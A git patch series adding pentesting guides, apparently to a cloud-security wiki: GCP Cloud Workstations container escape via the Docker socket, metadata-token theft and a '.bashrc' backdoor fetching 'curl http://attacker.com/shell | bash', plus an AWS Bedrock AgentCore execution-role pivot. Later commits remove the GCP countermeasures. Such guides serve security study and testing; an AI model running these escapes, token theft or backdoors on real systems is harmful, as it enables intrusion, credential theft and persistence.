From 4a16d25bfe51a53a06db0bf77699346eb0ef1efd Mon Sep 17 00:00:00 2001
From: Ben <93559326+AI-redteam@users.noreply.github.com>
Date: Mon, 9 Feb 2026 16:08:37 -0600
Subject: [PATCH 1/7] Add GCP Cloud Workstations privesc guide

Add a new guide documenting privilege escalation paths for GCP Cloud Workstations. Covers Docker-in-Docker container breakout via /var/run/docker.sock, step-by-step escape to the host VM, stealing the VM service account token from IMDS, persistence by backdooring the host home, network pivot techniques, and recommended countermeasures. Includes reference to an automation script and training banners.
---
 .../gcp-cloud-workstations-privesc.md         | 124 ++++++++++++++++++
 1 file changed, 124 insertions(+)
 create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md

diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
new file mode 100644
index 000000000..51923872d
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
@@ -0,0 +1,124 @@
+# GCP - Cloud Workstations Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Workstations
+
+For more information about Cloud Workstations check:
+
+{{#ref}}
+../gcp-services/gcp-cloud-workstations-enum.md
+{{#endref}}
+
+### Container Breakout via Docker Socket (Container -> VM -> Project)
+
+The primary privilege escalation path in Cloud Workstations stems from the requirement to support **Docker-in-Docker (DinD)** workflows for developers. When the workstation configuration mounts the Docker socket or allows privileged containers (a common configuration), an attacker inside the workstation container can escape to the underlying Compute Engine VM and steal its service account token.
+
+**Prerequisites:**
+- Access to a Cloud Workstation terminal (via SSH, compromised session, or stolen credentials)
+- The workstation configuration must mount `/var/run/docker.sock` or enable privileged containers
+
+**Architecture context:** The workstation is a container (Layer 3) running on a Docker/Containerd runtime (Layer 2) on a GCE VM (Layer 1). The Docker socket gives direct access to the host's container runtime.
+
+> [!NOTE]
+> The tool [gcp-workstations-containerEscapeScript](https://github.com/AI-redteam/gcp-workstations-containerEscapeScript) automates the full container escape and drops you into a root shell on the host VM.
+
+<details>
+
+<summary>Step 1: Check for Docker socket</summary>
+
+```bash
+# Verify the Docker socket is available
+ls -l /var/run/docker.sock
+# Expected output: srw-rw---- 1 root docker 0 ...
+```
+
+</details>
+
+<details>
+
+<summary>Step 2: Escape to the host VM filesystem</summary>
+
+We launch a privileged container, mounting the host's root directory to `/mnt/host`. We also share the host's network and PID namespace to maximize visibility.
+
+```bash
+# Spawn a privileged container mounting the host's root filesystem
+docker run -it --rm --privileged --net=host --pid=host \
+  -v /:/mnt/host \
+  alpine sh
+
+# Inside the new container, chroot into the host
+chroot /mnt/host /bin/bash
+```
+
+You now have a **root shell on the underlying Compute Engine VM** (Layer 1).
+
+</details>
+
+<details>
+
+<summary>Step 3: Steal the VM service account token from IMDS</summary>
+
+```bash
+# From the host VM, query the Instance Metadata Service
+curl -s -H "Metadata-Flavor: Google" \
+  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token
+
+# Check which service account is attached
+curl -s -H "Metadata-Flavor: Google" \
+  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/email
+
+# Check scopes (CRITICAL STEP)
+curl -s -H "Metadata-Flavor: Google" \
+  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scopes
+```
+
+</details>
+
+> [!CAUTION]
+> **Check the Scopes!**
+> Even if the attached Service Account is **Editor**, the VM might be restricted by access scopes.
+> If you see `https://www.googleapis.com/auth/cloud-platform`, you have full access.
+> If you only see `logging.write` and `monitoring.write`, you are limited to the **Network Pivot** and **Persistence** vectors below.
+
+<details>
+
+<summary>Step 4: Achieve Persistence (Backdoor the User)</summary>
+
+Cloud Workstations mount a persistent disk to `/home/user`. Because the container user (usually `user`, UID 1000) matches the host user (UID 1000), you can write to the host's home directory. This allows you to backdoor the environment even if the workstation container is rebuilt.
+
+```bash
+# Check if you can write to the host's persistent home
+ls -la /mnt/host/home/user/
+
+# Drop a backdoor that executes next time the developer logs in
+# Note: Do this from the container escape context
+echo "curl http://attacker.com/shell | bash" >> /mnt/host/home/user/.bashrc
+```
+
+</details>
+
+<details>
+
+<summary>Step 5: Network Pivot (Internal VPC Access)</summary>
+
+Since you share the host network namespace (`--net=host`), you are now a trusted node on the VPC. You can scan for internal services that allow access based on IP whitelisting.
+
+```bash
+# Install scanning tools on the host (if internet access allows)
+apk add nmap
+
+# Scan the internal VPC subnet
+nmap -sS -p 80,443,22 10.0.0.0/8
+```
+
+</details>
+
+**Countermeasures:**
+
+* Disable "Running as root" in the Workstation Configuration
+* Do not mount `/var/run/docker.sock` — use remote builders (e.g., Cloud Build) instead
+* Assign a **custom service account** with minimal permissions to workstation configurations (e.g., `roles/source.reader`, `roles/artifactregistry.reader`)
+* Place the workstation project inside a **VPC Service Controls** perimeter
+
+{{#include ../../../banners/hacktricks-training.md}}

From 6b1b2329c24a2107842d20f344a66653bb537849 Mon Sep 17 00:00:00 2001
From: Ben <93559326+AI-redteam@users.noreply.github.com>
Date: Mon, 9 Feb 2026 16:10:20 -0600
Subject: [PATCH 2/7] Clean up GCP Cloud Workstations privilege escalation doc

Removed introductory content and references related to Cloud Workstations.
---
 .../gcp-cloud-workstations-privesc.md                    | 9 ---------
 1 file changed, 9 deletions(-)

diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
index 51923872d..ec5a353a3 100644
--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
@@ -1,14 +1,5 @@
 # GCP - Cloud Workstations Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
-## Cloud Workstations
-
-For more information about Cloud Workstations check:
-
-{{#ref}}
-../gcp-services/gcp-cloud-workstations-enum.md
-{{#endref}}
 
 ### Container Breakout via Docker Socket (Container -> VM -> Project)
 

From 0be98dc154a514f95e8f01ad5a1cc5d691c08716 Mon Sep 17 00:00:00 2001
From: Ben <93559326+AI-redteam@users.noreply.github.com>
Date: Mon, 9 Feb 2026 16:12:22 -0600
Subject: [PATCH 3/7] Remove hacktricks-training banner from documentation

Removed the inclusion of hacktricks-training banner from the GCP privilege escalation documentation.
---
 .../gcp-privilege-escalation/gcp-cloud-workstations-privesc.md  | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
index ec5a353a3..a0019a234 100644
--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
@@ -112,4 +112,4 @@ nmap -sS -p 80,443,22 10.0.0.0/8
 * Assign a **custom service account** with minimal permissions to workstation configurations (e.g., `roles/source.reader`, `roles/artifactregistry.reader`)
 * Place the workstation project inside a **VPC Service Controls** perimeter
 
-{{#include ../../../banners/hacktricks-training.md}}
+

From 2bb129291247eee3f6f619313fe6b2fb1a622e89 Mon Sep 17 00:00:00 2001
From: Ben <93559326+AI-redteam@users.noreply.github.com>
Date: Mon, 9 Feb 2026 16:16:44 -0600
Subject: [PATCH 4/7] Remove countermeasures from GCP privilege escalation doc

Removed countermeasures section from GCP privilege escalation documentation.
---
 .../gcp-cloud-workstations-privesc.md                       | 6 ------
 1 file changed, 6 deletions(-)

diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
index a0019a234..57cd6bc39 100644
--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md
@@ -105,11 +105,5 @@ nmap -sS -p 80,443,22 10.0.0.0/8
 
 </details>
 
-**Countermeasures:**
-
-* Disable "Running as root" in the Workstation Configuration
-* Do not mount `/var/run/docker.sock` — use remote builders (e.g., Cloud Build) instead
-* Assign a **custom service account** with minimal permissions to workstation configurations (e.g., `roles/source.reader`, `roles/artifactregistry.reader`)
-* Place the workstation project inside a **VPC Service Controls** perimeter
 
 

From 70738d211e8ef9a1425394d7bd579ba4e7dc9cd2 Mon Sep 17 00:00:00 2001
From: Oussama Ait Manssour <67986338+AMOussama@users.noreply.github.com>
Date: Thu, 12 Feb 2026 00:06:33 +0100
Subject: [PATCH 5/7] Revise AWS Bedrock AgentCore Code Interpreter
 documentation

Updated the AWS Bedrock AgentCore documentation to clarify the Code Interpreter Role Pivot technique, including details on preconditions, required IAM actions, exploitation flow, and mitigation strategies.
---
 .../aws-bedrock-agentcore-privesc.md          | 88 +++++++++++++++++++
 1 file changed, 88 insertions(+)
 create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md

diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md
new file mode 100644
index 000000000..3f523b975
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md	
@@ -0,0 +1,88 @@
+# AWS Bedrock AgentCore - Code Interpreter Role Pivot
+
+## Service
+
+**Amazon Bedrock AgentCore**
+
+## Technique Name
+
+**Code Interpreter Role Pivot** (Privilege escalation/lateral movement via over-privileged `executionRoleArn`)
+
+## Why this Matters
+
+Amazon Bedrock AgentCore introduced a "Code Interpreter" feature in mid-2025 that acts as a managed compute surface. It executes code within a Firecracker MicroVM-isolated environment. The critical security hook is the **`executionRoleArn`**: this is the IAM identity the interpreter uses to interact with other AWS services.
+
+When a developer grants this service-linked role excessive permissions (e.g., `s3:*`, `secretsmanager:GetSecretValue`), any user with the ability to invoke the interpreter can effectively "hijack" those permissions to move laterally or escalate privileges within the account.
+
+
+## Preconditions (The Misconfiguration)
+
+1. **Over-privileged Execution Role:** An AgentCore Code Interpreter is configured with a role that has access to sensitive data or administrative APIs.
+2. **Broad Invocation Access:** A low-privileged IAM principal is granted permission to start or interact with these sessions.
+3. **Governance Failure:** The environment is treated as "AI experimental tooling" rather than "Managed Compute," bypassing standard Least Privilege reviews.
+
+
+## Required IAM Actions
+
+To execute this pivot, an attacker needs one or more of the following `bedrock-agentcore` actions:
+
+* `bedrock-agentcore:StartCodeInterpreterSession`
+* `bedrock-agentcore:InvokeCodeInterpreter`
+* `bedrock-agentcore:CreateCodeInterpreter` (Allows creating a session with a pre-existing role)
+
+> **Note on `iam:PassRole`:** In current AWS Service Authorization References, `CreateCodeInterpreter` does not explicitly list `iam:PassRole` as a dependency in the same way `CreateGateway` does. This creates a potential "PassRole-less" role selection edge case that should be validated in target environments.
+
+
+## Exploitation Flow
+
+### 1. Reconnaissance
+
+Identify existing interpreters and their associated execution roles.
+
+```bash
+aws bedrock-agentcore-control list-code-interpreters
+aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <TARGET_ID>
+
+```
+
+### 2. Session Initiation
+
+Start a session to gain access to the compute environment.
+
+```bash
+aws bedrock-agentcore start-code-interpreter-session --code-interpreter-id <TARGET_ID>
+
+```
+
+### 3. Lateral Movement / Exfiltration
+
+Invoke the interpreter to execute Python code that uses the `executionRoleArn` credentials to access other services.
+
+```python
+import boto3
+# The interpreter uses the executionRoleArn automatically
+s3 = boto3.client('s3')
+print(s3.list_buckets())
+
+```
+
+
+## Mitigation & Detection
+
+### **Prevention**
+
+* **Apply Permission Boundaries:** Attach a boundary to the `executionRoleArn` to ensure it cannot perform IAM mutations or sensitive data deletions, regardless of its primary policy.
+* **Restrict Invocation:** Limit `StartCodeInterpreterSession` and `InvokeCodeInterpreter` to specific, authorized admin principals.
+* **Identity Scoping:** Use the `bedrock-agentcore:sessionId` and `bedrock-agentcore:actorId` condition keys to ensure sessions are isolated to specific users.
+
+### **Detection**
+
+* **CloudTrail Monitoring:** Monitor for `StartCodeInterpreterSession` events from unexpected IPs or principals.
+* **Credential Usage:** Alert on the use of AgentCore execution role credentials (detectable via the `UserAgent` or `PrincipalId` in CloudTrail) to access S3 buckets or Secrets Manager outside of normal AI operations.
+
+
+## References
+
+* [AWS CLI Reference: create-code-interpreter](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore-control/create-code-interpreter.html)
+* [AWS Service Authorization: Bedrock AgentCore](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonbedrockagentcore.html)
+* [AWS CLI: start-code-interpreter-session](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html)

From 9f57fc71197be234430324f5dc35db435c641e07 Mon Sep 17 00:00:00 2001
From: Oussama Ait Manssour <67986338+AMOussama@users.noreply.github.com>
Date: Thu, 12 Feb 2026 11:04:17 +0100
Subject: [PATCH 6/7] Rename
 src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security
 /aws-bedrock-agentcore-privesc.md to
 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md

---
 .../README.md}                                                    | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename src/pentesting-cloud/aws-security/aws-privilege-escalation/{src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md => aws-bedrock-agentcore-privesc/README.md} (100%)

diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md
similarity index 100%
rename from src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md
rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md

From 45573491412c93664bb78a52b2dda41ad5bc670e Mon Sep 17 00:00:00 2001
From: Oussama Ait Manssour <67986338+AMOussama@users.noreply.github.com>
Date: Thu, 12 Feb 2026 18:35:30 +0100
Subject: [PATCH 7/7] docs(aws): add AgentCore Code Interpreter role pivot
 privesc

---
 .../aws-bedrock-agentcore-privesc/README.md   |  88 -------------
 .../aws-bedrock-privesc/README.md             | 122 ++++++++++++++++++
 2 files changed, 122 insertions(+), 88 deletions(-)
 delete mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md
 create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md

diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md
deleted file mode 100644
index 3f523b975..000000000
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md
+++ /dev/null
@@ -1,88 +0,0 @@
-# AWS Bedrock AgentCore - Code Interpreter Role Pivot
-
-## Service
-
-**Amazon Bedrock AgentCore**
-
-## Technique Name
-
-**Code Interpreter Role Pivot** (Privilege escalation/lateral movement via over-privileged `executionRoleArn`)
-
-## Why this Matters
-
-Amazon Bedrock AgentCore introduced a "Code Interpreter" feature in mid-2025 that acts as a managed compute surface. It executes code within a Firecracker MicroVM-isolated environment. The critical security hook is the **`executionRoleArn`**: this is the IAM identity the interpreter uses to interact with other AWS services.
-
-When a developer grants this service-linked role excessive permissions (e.g., `s3:*`, `secretsmanager:GetSecretValue`), any user with the ability to invoke the interpreter can effectively "hijack" those permissions to move laterally or escalate privileges within the account.
-
-
-## Preconditions (The Misconfiguration)
-
-1. **Over-privileged Execution Role:** An AgentCore Code Interpreter is configured with a role that has access to sensitive data or administrative APIs.
-2. **Broad Invocation Access:** A low-privileged IAM principal is granted permission to start or interact with these sessions.
-3. **Governance Failure:** The environment is treated as "AI experimental tooling" rather than "Managed Compute," bypassing standard Least Privilege reviews.
-
-
-## Required IAM Actions
-
-To execute this pivot, an attacker needs one or more of the following `bedrock-agentcore` actions:
-
-* `bedrock-agentcore:StartCodeInterpreterSession`
-* `bedrock-agentcore:InvokeCodeInterpreter`
-* `bedrock-agentcore:CreateCodeInterpreter` (Allows creating a session with a pre-existing role)
-
-> **Note on `iam:PassRole`:** In current AWS Service Authorization References, `CreateCodeInterpreter` does not explicitly list `iam:PassRole` as a dependency in the same way `CreateGateway` does. This creates a potential "PassRole-less" role selection edge case that should be validated in target environments.
-
-
-## Exploitation Flow
-
-### 1. Reconnaissance
-
-Identify existing interpreters and their associated execution roles.
-
-```bash
-aws bedrock-agentcore-control list-code-interpreters
-aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <TARGET_ID>
-
-```
-
-### 2. Session Initiation
-
-Start a session to gain access to the compute environment.
-
-```bash
-aws bedrock-agentcore start-code-interpreter-session --code-interpreter-id <TARGET_ID>
-
-```
-
-### 3. Lateral Movement / Exfiltration
-
-Invoke the interpreter to execute Python code that uses the `executionRoleArn` credentials to access other services.
-
-```python
-import boto3
-# The interpreter uses the executionRoleArn automatically
-s3 = boto3.client('s3')
-print(s3.list_buckets())
-
-```
-
-
-## Mitigation & Detection
-
-### **Prevention**
-
-* **Apply Permission Boundaries:** Attach a boundary to the `executionRoleArn` to ensure it cannot perform IAM mutations or sensitive data deletions, regardless of its primary policy.
-* **Restrict Invocation:** Limit `StartCodeInterpreterSession` and `InvokeCodeInterpreter` to specific, authorized admin principals.
-* **Identity Scoping:** Use the `bedrock-agentcore:sessionId` and `bedrock-agentcore:actorId` condition keys to ensure sessions are isolated to specific users.
-
-### **Detection**
-
-* **CloudTrail Monitoring:** Monitor for `StartCodeInterpreterSession` events from unexpected IPs or principals.
-* **Credential Usage:** Alert on the use of AgentCore execution role credentials (detectable via the `UserAgent` or `PrincipalId` in CloudTrail) to access S3 buckets or Secrets Manager outside of normal AI operations.
-
-
-## References
-
-* [AWS CLI Reference: create-code-interpreter](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore-control/create-code-interpreter.html)
-* [AWS Service Authorization: Bedrock AgentCore](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonbedrockagentcore.html)
-* [AWS CLI: start-code-interpreter-session](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html)
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
new file mode 100644
index 000000000..017d1323b
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md
@@ -0,0 +1,122 @@
+# AWS - Bedrock PrivEsc
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Amazon Bedrock AgentCore
+
+### `bedrock-agentcore:StartCodeInterpreterSession` + `bedrock-agentcore:InvokeCodeInterpreter` - Code Interpreter Execution-Role Pivot
+
+AgentCore Code Interpreter is a managed execution environment. **Custom Code Interpreters** can be configured with an **`executionRoleArn`** that “provides permissions for the code interpreter to access AWS services”.
+
+If a **lower-privileged IAM principal** can **start + invoke** a Code Interpreter session that is configured with a **more privileged execution role**, the caller can effectively **pivot into the execution role’s permissions** (lateral movement / privilege escalation depending on role scope).
+
+> [!NOTE]
+> This is typically a **misconfiguration / excessive permissions** issue (granting wide permissions to the interpreter execution role and/or granting broad invoke access).
+> AWS explicitly warns to avoid privilege escalation by ensuring execution roles have **equal or fewer** privileges than identities allowed to invoke.
+
+#### Preconditions (common misconfiguration)
+
+- A **custom code interpreter** exists with an over-privileged **execution role** (ex: access to sensitive S3/Secrets/SSM or IAM-admin-like capabilities).
+- A user (developer/auditor/CI identity) has permissions to:
+  - start sessions: `bedrock-agentcore:StartCodeInterpreterSession`
+  - invoke tools: `bedrock-agentcore:InvokeCodeInterpreter`
+- (Optional) The user can also create interpreters: `bedrock-agentcore:CreateCodeInterpreter` (lets them create a new interpreter configured with an execution role, depending on org guardrails).
+
+#### Recon (identify custom interpreters and execution role usage)
+
+List interpreters (control-plane) and inspect their configuration:
+
+```bash
+aws bedrock-agentcore-control list-code-interpreters
+aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID>
+````
+
+> The create-code-interpreter command supports `--execution-role-arn` which defines what AWS permissions the interpreter will have.
+
+#### Step 1 - Start a session (this returns a `sessionId`, not an interactive shell)
+
+```bash
+SESSION_ID=$(
+  aws bedrock-agentcore start-code-interpreter-session \
+    --code-interpreter-identifier <CODE_INTERPRETER_IDENTIFIER> \
+    --name "arte-oussama" \
+    --query sessionId \
+    --output text
+)
+
+echo "SessionId: $SESSION_ID"
+```
+
+#### Step 2 - Invoke code execution (Boto3 or signed HTTPS)
+
+There is **no interactive python shell** from `start-code-interpreter-session`. Execution happens via **InvokeCodeInterpreter**.
+
+**Option A - Boto3 example (execute Python + verify identity):**
+
+```python
+import boto3
+
+client = boto3.client("bedrock-agentcore", region_name="<REGION>")
+
+# Execute python inside the Code Interpreter session
+resp = client.invoke_code_interpreter(
+    codeInterpreterIdentifier="<CODE_INTERPRETER_IDENTIFIER>",
+    sessionId="<SESSION_ID>",
+    name="executeCode",
+    arguments={
+        "language": "python",
+        "code": "import boto3; print(boto3.client('sts').get_caller_identity())"
+    }
+)
+
+# Response is streamed; print events for visibility
+for event in resp.get("stream", []):
+    print(event)
+```
+
+If the interpreter is configured with an execution role, the `sts:GetCallerIdentity()` output should reflect that role’s identity (not the low-priv caller), demonstrating the pivot.
+
+**Option B - Signed HTTPS call (awscurl):**
+
+```bash
+awscurl -X POST \
+  "https://bedrock-agentcore.<Region>.amazonaws.com/code-interpreters/<CODE_INTERPRETER_IDENTIFIER>/tools/invoke" \
+  -H "Content-Type: application/json" \
+  -H "Accept: application/json" \
+  -H "x-amzn-code-interpreter-session-id: <SESSION_ID>" \
+  --service bedrock-agentcore \
+  --region <Region> \
+  -d '{
+    "name": "executeCode",
+    "arguments": {
+      "language": "python",
+      "code": "print(\"Hello from AgentCore\")"
+    }
+  }'
+```
+
+#### Impact
+
+* **Lateral movement** into whatever AWS access the interpreter execution role has.
+* **Privilege escalation** if the interpreter execution role is more privileged than the caller.
+* Harder detection if CloudTrail data events for interpreter invocations are not enabled (invocations may not be logged by default, depending on configuration).
+
+#### Mitigations / Hardening
+
+* **Least privilege** on the interpreter `executionRoleArn` (treat it like Lambda execution roles / CI roles).
+* **Restrict who can invoke** (`bedrock-agentcore:InvokeCodeInterpreter`) and who can start sessions.
+* Use **SCPs** to deny InvokeCodeInterpreter except for approved agent runtime roles (org-level enforcement can be necessary).
+* Enable appropriate **CloudTrail data events** for AgentCore where applicable; alert on unexpected invocations and session creation.
+
+## References
+
+- [Sonrai: AWS AgentCore privilege escalation path (SCP mitigation)](https://sonraisecurity.com/blog/aws-agentcore-privilege-escalation-bedrock-scp-fix/)
+- [Sonrai: Credential exfiltration paths in AWS code interpreters (MMDS)](https://sonraisecurity.com/blog/sandboxed-to-compromised-new-research-exposes-credential-exfiltration-paths-in-aws-code-interpreters/)
+- [AWS CLI: create-code-interpreter (`--execution-role-arn`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore-control/create-code-interpreter.html)
+- [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html)
+- [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html)
+- [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html)
+
+
+{{#include ../../../../banners/hacktricks-training.md}}
+